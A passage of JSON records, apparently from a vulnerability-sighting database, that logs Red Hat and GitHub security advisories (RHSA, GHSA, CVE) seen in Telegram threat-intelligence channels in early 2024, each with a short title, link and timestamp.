"RHSA-2024:0710", "type": "seen", "source": "https://t.me/ctinow/180328", "content": "https://ift.tt/m37qBUI\nRHSA-2024:0710: Moderate: Red Hat JBoss Enterprise Application Platform 7.4.15 Security update", "creation_timestamp": "2024-02-06T21:17:01.000000Z"}, {"uuid": "28a72f89-86c5-4952-9111-0f6afd261193", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HC6X-CW6P-GJ7H", "type": "seen", "source": "https://t.me/ctinow/179870", "content": "https://ift.tt/DHx2rp1\nCVE-2023-45236 | TianoCore EDK2 stable202308 TCP Initial Sequence Number information disclosure (GHSA-hc6x-cw6p-gj7h)", "creation_timestamp": "2024-02-06T10:11:16.000000Z"}, {"uuid": "f71da662-a00e-4585-87b5-acbd73fe7ce4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0843", "type": "seen", "source": "https://t.me/ctinow/185530", "content": "https://ift.tt/awTMzch\nRHSA-2024:0843: Critical: Release of OpenShift Serverless 1.31.1", "creation_timestamp": "2024-02-15T14:16:31.000000Z"}, {"uuid": "47ae46ad-f8e0-4861-abb6-c394bc24033f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2022:1600", "type": "seen", "source": "https://t.me/cibsecurity/70595", "content": "\u203c CVE-2022-3466 \u203c\n\nThe version of cri-o as released for Red Hat OpenShift Container Platform 4.9.48, 4.10.31, and 4.11.6 via RHBA-2022:6316, RHBA-2022:6257, and RHBA-2022:6658, respectively, included an incorrect version of cri-o missing the fix for CVE-2022-27652, which was previously fixed in OCP 4.9.41 and 4.10.12 via RHBA-2022:5433 and RHSA-2022:1600. This issue could allow an attacker with access to programs with inheritable file capabilities to elevate those capabilities to the permitted set when execve(2) runs. For more details, see https://access.redhat.com/security/cve/CVE-2022-27652.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2023-09-15T18:25:30.000000Z"}, {"uuid": "3cc7a9a2-cf07-439b-bbcb-babbc471576a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CW9J-Q3VF-HRRV", "type": "seen", "source": "https://t.me/ctinow/185679", "content": "https://ift.tt/1we8tq3\n[GHSA-cw9j-q3vf-hrrv] Scrapy authorization header leakage on cross-domain redirect", "creation_timestamp": "2024-02-15T16:46:45.000000Z"}, {"uuid": "13af254c-76cd-4783-a9d2-dcbf9ca76f91", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CC65-XXVF-F7R9", "type": "seen", "source": "https://t.me/ctinow/185666", "content": "https://ift.tt/8QE1x5P\n[GHSA-cc65-xxvf-f7r9] ReDos vulnerability of XMLFeedSpider", "creation_timestamp": "2024-02-15T16:32:03.000000Z"}, {"uuid": "e3c19729-16c0-40f3-a334-809943520cc0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0848", "type": "seen", "source": "https://t.me/ctinow/185654", "content": "https://ift.tt/fup02PA\nRHSA-2024:0848: Important: .NET 8.0 security update", "creation_timestamp": "2024-02-15T16:16:31.000000Z"}, {"uuid": "7069b679-a504-48d1-ad35-eb0b2c0e9811", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0729", "type": "seen", "source": "https://t.me/ctinow/180963", "content": "https://ift.tt/Qd9tJ7g\nRHSA-2024:0729: Critical: Red Hat Advanced Cluster Management 2.7.11 security and bug fix container update", "creation_timestamp": "2024-02-07T21:17:04.000000Z"}, {"uuid": "97f03da5-3be0-4baa-8ec6-1b06b7bf5dbc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-87M3-6QJ3-P3XH", "type": "seen", "source": "https://t.me/ctinow/180951", "content": "https://ift.tt/kx9A5NV\n[GHSA-87m3-6qj3-p3xh] Liferay Portal denial of service (memory consumption)", "creation_timestamp": "2024-02-07T20:46:47.000000Z"}, {"uuid": "838643d3-90dd-46c9-b72b-b44488655351", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-M8V7-469P-5X89", "type": "seen", "source": "https://t.me/ctinow/185770", "content": "https://ift.tt/JTSwZY4\nCVE-2024-23685 | mod-remote-storage up to 1.7.1/2.0.2 hard-coded credentials (GHSA-m8v7-469p-5x89)", "creation_timestamp": "2024-02-15T18:57:00.000000Z"}, {"uuid": "391d8241-af2e-4758-9285-f68263613f91", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0827", "type": "seen", "source": "https://t.me/ctinow/185358", "content": "https://ift.tt/ITpjQtc\nRHSA-2024:0827: Important: .NET 8.0 security update", "creation_timestamp": "2024-02-15T09:16:42.000000Z"}, {"uuid": "ce42045f-f8d1-4082-8071-07dbb2433d2a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0773", "type": "seen", "source": "https://t.me/ctinow/182994", "content": "https://ift.tt/CpOQAYl\nRHSA-2024:0773: Important: squid:4 security update", "creation_timestamp": "2024-02-12T10:16:22.000000Z"}, {"uuid": "cd5f828b-408d-44e0-9c09-55e464624107", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0774", "type": "seen", "source": "https://t.me/ctinow/182993", "content": "https://ift.tt/SRMNmq0\nRHSA-2024:0774: Moderate: Red Hat Certificate System 10.4 for RHEL 8 security and bug fix update", "creation_timestamp": "2024-02-12T10:16:21.000000Z"}, {"uuid": "e12717a6-02d8-4959-81f5-2d9829ec229f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0320", "type": "seen", "source": "https://t.me/ctinow/182987", "content": "https://ift.tt/DwH1hxk\nCVE-2024-0229 | X.org X11 Server Master Device out-of-bounds (RHSA-2024:0320)", "creation_timestamp": "2024-02-12T10:11:57.000000Z"}, {"uuid": "ca17a2e6-8177-47a4-b903-2f96485796ae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-622Q-XHFR-XMV7", "type": "seen", "source": "https://t.me/ctinow/183117", "content": "https://ift.tt/UfN7V0e\nCVE-2024-22400 | NextCloud User Saml up to 5.1.4/5.2.4/6.0.0 Link redirect (GHSA-622q-xhfr-xmv7)", "creation_timestamp": "2024-02-12T14:41:41.000000Z"}, {"uuid": "17974b27-7813-4095-84a5-2f935de164ef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0412", "type": "seen", "source": "https://t.me/ctinow/178574", "content": "https://ift.tt/vw4jfuF\nCVE-2024-0562 | Linux Kernel up to 6.0-rc2 page-writeback.c wb_inode_writeback_end use after free (RHSA-2024:0412)", "creation_timestamp": "2024-02-03T14:52:09.000000Z"}, {"uuid": "be86c968-9273-44fe-a779-a63e6c85d342", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CX5C-XWCV-VHMQ", "type": "seen", "source": "https://t.me/ctinow/182909", "content": "https://ift.tt/H9gXKU0\nCVE-2024-22410 | gluwa creditcoin on Windows untrusted search path (GHSA-cx5c-xwcv-vhmq)", "creation_timestamp": "2024-02-12T06:31:56.000000Z"}, {"uuid": "2d9c77f7-43cc-4a81-8e13-a059227031eb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6845-XW22-FFXV", "type": "seen", "source": "https://t.me/ctinow/179472", "content": "https://ift.tt/8SDJOgP\n[GHSA-6845-xw22-ffxv] Vyper sha3 codegen bug", "creation_timestamp": "2024-02-05T20:37:00.000000Z"}, {"uuid": "aa814c07-7538-40f8-8956-3e734fdc9840", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HC6X-CW6P-GJ7H", "type": "seen", "source": "https://t.me/ctinow/179866", "content": "https://ift.tt/KyMPmE2\nCVE-2023-45230 | TianoCore EDK2 stable202308 DHCPv6 Client buffer overflow (GHSA-hc6x-cw6p-gj7h)", "creation_timestamp": "2024-02-06T10:11:11.000000Z"}, {"uuid": "a32e892e-5450-4df9-ad80-222ca98c8c9b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HC6X-CW6P-GJ7H", "type": "seen", "source": "https://t.me/ctinow/179865", "content": "https://ift.tt/jWh1nxS\nCVE-2023-45229 | TianoCore EDK2 stable202308 DHCPv6 Advertise Message IA_NA/IA_TA out-of-bounds (GHSA-hc6x-cw6p-gj7h)", "creation_timestamp": "2024-02-06T10:11:10.000000Z"}, {"uuid": "243065d8-67e2-4fa8-861e-105941889a9f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HC6X-CW6P-GJ7H", "type": "seen", "source": "https://t.me/ctinow/179858", "content": "https://ift.tt/bqDpgVa\nCVE-2023-45231 | TianoCore EDK2 stable202308 out-of-bounds (GHSA-hc6x-cw6p-gj7h)", "creation_timestamp": "2024-02-06T09:41:30.000000Z"}, {"uuid": "b2eb9af0-ac5a-49cd-8f95-78aad6e14985", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-G3CM-QG2V-2HJ5", "type": "seen", "source": "https://t.me/ctinow/179646", "content": "https://ift.tt/G3X1KnV\n[GHSA-g3cm-qg2v-2hj5] pyLoad open redirect vulnerability due to improper validation of the is_safe_url function", "creation_timestamp": "2024-02-06T00:36:40.000000Z"}, {"uuid": "b13deb81-1aeb-4930-ac61-4d059b8b3780", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7QW4-9R68-2RMX", "type": "seen", "source": "https://t.me/ctinow/179614", "content": "https://ift.tt/V3Ivxng\n[GHSA-7qw4-9r68-2rmx] mingSoft MCMS File Upload vulnerability", "creation_timestamp": "2024-02-05T23:46:30.000000Z"}, {"uuid": "d5a1bbce-f2ea-4c45-803f-8a74310f39b3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9CGF-PXWQ-2CPW", "type": "seen", "source": "https://t.me/ctinow/179613", "content": "https://ift.tt/NfQM8eZ\n[GHSA-9cgf-pxwq-2cpw] Stimulsoft Dashboard.JS Cross Site Scripting vulnerability", "creation_timestamp": "2024-02-05T23:46:29.000000Z"}, {"uuid": "cd02ba86-2aed-41c8-89aa-bfe86bb08ba9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0741", "type": "seen", "source": "https://t.me/ctinow/184449", "content": "https://ift.tt/zCpaHLm\nRHSA-2024:0741: Critical: OpenShift Container Platform 4.13.33 bug fix and security update", "creation_timestamp": "2024-02-14T08:16:56.000000Z"}, {"uuid": "a36bf244-8586-4aa6-8eba-3e4b1455749d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0740", "type": "seen", "source": "https://t.me/ctinow/184428", "content": "https://ift.tt/Xmnge3A\nRHSA-2024:0740: Critical: OpenShift Container Platform 4.13.33 security and extras update", "creation_timestamp": "2024-02-14T07:16:58.000000Z"}, {"uuid": "2ec6d439-3fd6-4e51-b29f-ea285f8da9e4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0796", "type": "seen", "source": "https://t.me/ctinow/183695", "content": "https://ift.tt/tQsKSO5\nRHSA-2024:0796: Moderate: gnutls security update", "creation_timestamp": "2024-02-13T10:16:42.000000Z"}, {"uuid": "e1f92582-6c31-47e6-9bcd-de48028be84c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VH73-Q3RW-QX7W", "type": "seen", "source": "https://t.me/ctinow/179642", "content": "https://ift.tt/TasdvYV\n[GHSA-vh73-q3rw-qx7w] Boundary vulnerable to session hijacking through TLS certificate tampering", "creation_timestamp": "2024-02-06T00:16:44.000000Z"}, {"uuid": "24a139b5-a794-4598-b5c8-04778d16ba67", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9M6M-C64R-W4F4", "type": "seen", "source": "https://t.me/ctinow/179627", "content": "https://ift.tt/QD5zJxf\n[GHSA-9m6m-c64r-w4f4] Stimulsoft Dashboard.JS Cross Site Scripting vulnerability", "creation_timestamp": "2024-02-06T00:06:16.000000Z"}, {"uuid": "27b976f1-c920-4d90-8526-073c0db381f3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-944J-8CH6-RF6X", "type": "seen", "source": "https://t.me/ctinow/179623", "content": "https://ift.tt/LvWiBc7\n[GHSA-944j-8ch6-rf6x] m2crypto Bleichenbacher timing attack - incomplete fix for CVE-2020-25657", "creation_timestamp": "2024-02-05T23:56:56.000000Z"}, {"uuid": "6acee109-87ee-432b-ae37-9d6085aa0b1a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6CCV-8FGF-CJPW", "type": "seen", "source": "https://t.me/ctinow/183502", "content": "https://ift.tt/Blah2Zu\n[GHSA-6ccv-8fgf-cjpw] Drupal core Denial of Service vulnerability", "creation_timestamp": "2024-02-12T23:46:27.000000Z"}, {"uuid": "759dfd0e-f109-4c6f-b2b3-70d332ccd825", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0733", "type": "seen", "source": "https://t.me/ctinow/183294", "content": "https://ift.tt/smgYUPS\nCVE-2024-0690 | Red Hat Ansible 2.14/2.15/2.16 Log information disclosure (RHSA-2024:0733)", "creation_timestamp": "2024-02-12T17:46:10.000000Z"}, {"uuid": "38729349-dc56-4603-9329-b675febc3df9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3WW4-GG4F-JR7F", "type": "seen", "source": "https://t.me/ctinow/179643", "content": "https://ift.tt/JSleG7i\n[GHSA-3ww4-gg4f-jr7f] Python Cryptography package vulnerable to Bleichenbacher timing oracle attack", "creation_timestamp": "2024-02-06T00:16:46.000000Z"}, {"uuid": "a0641969-d3fd-45e0-9386-016b5cc89fe9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2019:3841", "type": "seen", "source": "https://t.me/ctinow/184538", "content": "https://ift.tt/DoAeKjO\nCVE-2019-0155 | Intel Core Processor/Pentium/Celeron/Atom/Xeon up to 26.20.100.6812 privileges management (RHSA-2019:3841)", "creation_timestamp": "2024-02-14T10:56:51.000000Z"}, {"uuid": "c3eae00a-72b0-4d32-8676-0c7cda970a99", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2020:0204", "type": "seen", "source": "https://t.me/ctinow/184537", "content": "https://ift.tt/s12ORSn\nCVE-2019-0154 | Intel Core Processor/Pentium/Celeron/Atom/Xeon Access Control input validation (RHSA-2020:0204)", "creation_timestamp": "2024-02-14T10:56:50.000000Z"}, {"uuid": "3341e388-b880-4409-9865-18b7aebe882f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9X7F-GWXQ-6F2C", "type": "seen", "source": "https://t.me/ctinow/177794", "content": "https://ift.tt/6i5GSka\n[GHSA-9x7f-gwxq-6f2c] Vyper's bounds check on built-in `slice()` function can be overflowed", "creation_timestamp": "2024-02-01T22:06:52.000000Z"}, {"uuid": "691d0ce9-c4bd-4601-9747-a24a19417f91", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XX8W-MQ23-29G4", "type": "seen", "source": "https://t.me/ctinow/177772", "content": "https://ift.tt/ZPQjWOH\n[GHSA-xx8w-mq23-29g4] Minio unsafe default: Access keys inherit `admin` of root user, allowing privilege escalation", "creation_timestamp": "2024-02-01T20:36:53.000000Z"}, {"uuid": "26a328e9-6b8b-4e27-9e0c-573411343811", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QX8M-MQX3-J9FM", "type": "seen", "source": "https://t.me/ctinow/178405", "content": "https://ift.tt/sT4kIfK\nCVE-2024-22209 | Open edX edx-platform Endpoint access control (GHSA-qx8m-mqx3-j9fm)", "creation_timestamp": "2024-02-03T07:11:02.000000Z"}, {"uuid": "ac013bae-dee7-4a3a-8537-deab0853704d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6P78-F7H9-6838", "type": "seen", "source": "https://t.me/ctinow/176214", "content": "https://ift.tt/gR8lYHG\n[GHSA-6p78-f7h9-6838] Craft CMS Feed-Me", "creation_timestamp": "2024-01-30T19:51:50.000000Z"}, {"uuid": "e949b86e-5624-45e2-b3e3-c362f2da95da", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3H3J-38XQ-V7HH", "type": "seen", "source": "https://t.me/ctinow/178400", "content": "https://ift.tt/GalPdCk\nCVE-2024-21640 | chromiumembedded cef OnFrameCaptured pixel_format out-of-bounds (GHSA-3h3j-38xq-v7hh)", "creation_timestamp": "2024-02-03T06:36:12.000000Z"}, {"uuid": "84878e13-a39f-4129-801a-177b80b7b70b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0660", "type": "seen", "source": "https://t.me/ctinow/180788", "content": "https://ift.tt/Ss1rKFu\nRHSA-2024:0660: Important: OpenShift Container Platform 4.13.32 bug fix and security update", "creation_timestamp": "2024-02-07T16:16:53.000000Z"}, {"uuid": "cc95edca-5e06-4716-b1ad-aae4cb63b2ef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-W277-WPQF-RCFV", "type": "seen", "source": "https://t.me/ctinow/180357", "content": "https://ift.tt/cU1sdhK\n[GHSA-w277-wpqf-rcfv] Svix vulnerable to improper comparison of different-length signatures", "creation_timestamp": "2024-02-06T21:46:32.000000Z"}, {"uuid": "9bf1b96c-a4c0-4290-8466-937818467e3b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-M95H-P4GG-WFW3", "type": "seen", "source": "https://t.me/ctinow/180341", "content": "https://ift.tt/YLly8Mz\n[GHSA-m95h-p4gg-wfw3] Allegro AI ClearML path traversal vulnerability", "creation_timestamp": "2024-02-06T21:36:30.000000Z"}, {"uuid": "9c56d7a0-6fbe-4be9-b1d4-3ffcf54336c2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CPCW-9H9M-WQW9", "type": "seen", "source": "https://t.me/ctinow/180340", "content": "https://ift.tt/43KANUh\n[GHSA-cpcw-9h9m-wqw9] Allegro AI ClearML vulnerable to deserialization of untrusted data", "creation_timestamp": "2024-02-06T21:36:29.000000Z"}, {"uuid": "6165a43b-36d8-4331-bfb5-6b9822f44b61", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H24R-M9QC-PVPG", "type": "seen", "source": "https://t.me/ctinow/180339", "content": "https://ift.tt/kBoEV39\n[GHSA-h24r-m9qc-pvpg] Ansible-core information disclosure flaw", "creation_timestamp": "2024-02-06T21:36:27.000000Z"}, {"uuid": "5aa98624-7f15-49b4-a5e6-9ebabaf8fae9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-F3H9-8PHC-6GVH", "type": "seen", "source": "https://t.me/ctinow/180338", "content": "https://ift.tt/iBXUbua\n[GHSA-f3h9-8phc-6gvh] Gradio Path Traversal vulnerability", "creation_timestamp": "2024-02-06T21:36:26.000000Z"}, {"uuid": "96657aeb-4274-451f-980f-37c4be158989", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0711", "type": "seen", "source": "https://t.me/ctinow/180327", "content": "https://ift.tt/ycUK0vf\nRHSA-2024:0711: Moderate: Red Hat JBoss Enterprise Application Platform 7.4.15 Security update", "creation_timestamp": "2024-02-06T21:16:59.000000Z"}, {"uuid": "d9d6ae75-4ae2-4cbf-a181-793d3dcb5a7b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-G74Q-5XW3-J7Q9", "type": "seen", "source": "https://t.me/ctinow/184183", "content": "https://ift.tt/ncSCUgm\n[GHSA-g74q-5xw3-j7q9] Microsoft Security Advisory CVE-2024-21386: .NET Denial of Service Vulnerability", "creation_timestamp": "2024-02-13T20:56:50.000000Z"}, {"uuid": "b2b695b7-f3bb-4155-b324-360383c3c9be", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-747X-5M58-MQ97", "type": "seen", "source": "https://t.me/ctinow/184093", "content": "https://ift.tt/2BdKbXS\n[GHSA-747x-5m58-mq97] svix vulnerable to Authentication Bypass", "creation_timestamp": "2024-02-13T19:46:37.000000Z"}, {"uuid": "d387936d-3bdb-4de2-a996-011eff3520f5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5MP4-32RR-V3X5", "type": "seen", "source": "https://t.me/ctinow/184759", "content": "https://ift.tt/RJmGbaz\n[GHSA-5mp4-32rr-v3x5] Absolute path traversal vulnerability in digdag server", "creation_timestamp": "2024-02-14T16:16:51.000000Z"}, {"uuid": "112cf836-60a1-4f4f-9191-409558da0740", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WR87-HX3W-29HH", "type": "seen", "source": "https://t.me/ctinow/183120", "content": "https://ift.tt/lex0cdf\nCVE-2024-22401 | NextCloud Guests up to 2.4.0/2.5.0/3.0.0 Allowed Apps List behavioral workflow (GHSA-wr87-hx3w-29hh)", "creation_timestamp": "2024-02-12T14:41:45.000000Z"}, {"uuid": "3a0d5b1c-b2bb-45e9-8ad6-7b545d2f0a81", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MG7W-X9FM-9WWC", "type": "seen", "source": "https://t.me/ctinow/183118", "content": "https://ift.tt/k6H7OlK\nCVE-2024-22213 | NextCloud Deck up to 1.9.4/1.11.1 Organization cross site scripting (GHSA-mg7w-x9fm-9wwc)", "creation_timestamp": "2024-02-12T14:41:42.000000Z"}, {"uuid": "6cc3bec8-9ad0-49f1-8972-ed78038f0472", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2020:0165", "type": "seen", "source": "https://t.me/ctinow/184662", "content": "https://ift.tt/i7ZzsIE\nCVE-2019-14818 | dpdk up to 16.11.9/17.11.7/18.11.3/19.08.0 File Descriptor resource consumption (RHSA-2020:0165)", "creation_timestamp": "2024-02-14T14:27:06.000000Z"}, {"uuid": "cd28810a-bf09-434f-bfad-bd56a3f09b5e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0792", "type": "seen", "source": "https://t.me/ctinow/183344", "content": "https://ift.tt/xbKV2mt\nRHSA-2024:0792: Moderate: Red Hat Integration Camel for Spring Boot 3.20.5 release and security update", "creation_timestamp": "2024-02-12T19:16:33.000000Z"}, {"uuid": "9fd4c8f3-1b87-4e5d-a01c-8c14a584dace", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0793", "type": "seen", "source": "https://t.me/ctinow/183343", "content": "https://ift.tt/Oj0d2ZT\nRHSA-2024:0793: Important: Red Hat Integration Camel for Spring Boot 4.0.3 release security update", "creation_timestamp": "2024-02-12T19:16:31.000000Z"}, {"uuid": "110272e2-c490-44b4-9ba5-e066acb8c46b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0814", "type": "seen", "source": "https://t.me/ctinow/184515", "content": "https://ift.tt/KM8Cv1h\nRHSA-2024:0814: Important: .NET 6.0 security, bug fix, and enhancement update", "creation_timestamp": "2024-02-14T10:16:40.000000Z"}, {"uuid": "2e24bc5f-c49d-4231-8a86-c512128c32bf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XWMV-CX7P-FQFC", "type": "seen", "source": "https://t.me/ctinow/184027", "content": "https://ift.tt/2kntFIu\n[GHSA-xwmv-cx7p-fqfc] caddy-security plugin for Caddy vulnerable to reflected Cross-site Scripting", "creation_timestamp": "2024-02-13T18:56:50.000000Z"}, {"uuid": "5509494a-92d6-4c7c-b590-03c4c2c14f06", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RJ3X-WVC6-5J66", "type": "seen", "source": "https://t.me/ctinow/184022", "content": "https://ift.tt/TZK7uzY\n[GHSA-rj3x-wvc6-5j66] TYPO3 vulnerable to Improper Access Control Persisting File Abstraction Layer Entities via Data Handler", "creation_timestamp": "2024-02-13T18:37:12.000000Z"}, {"uuid": "9d15eb43-1cbc-4143-8108-5978f3d5c754", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H47M-3F78-QP9G", "type": "seen", "source": "https://t.me/ctinow/184021", "content": "https://ift.tt/nOuvqjd\n[GHSA-h47m-3f78-qp9g] TYPO3 Install Tool vulnerable to Information Disclosure of Encryption Key", "creation_timestamp": "2024-02-13T18:37:11.000000Z"}, {"uuid": "f594e64a-63c6-42b1-a0e1-892cc125ba6a", 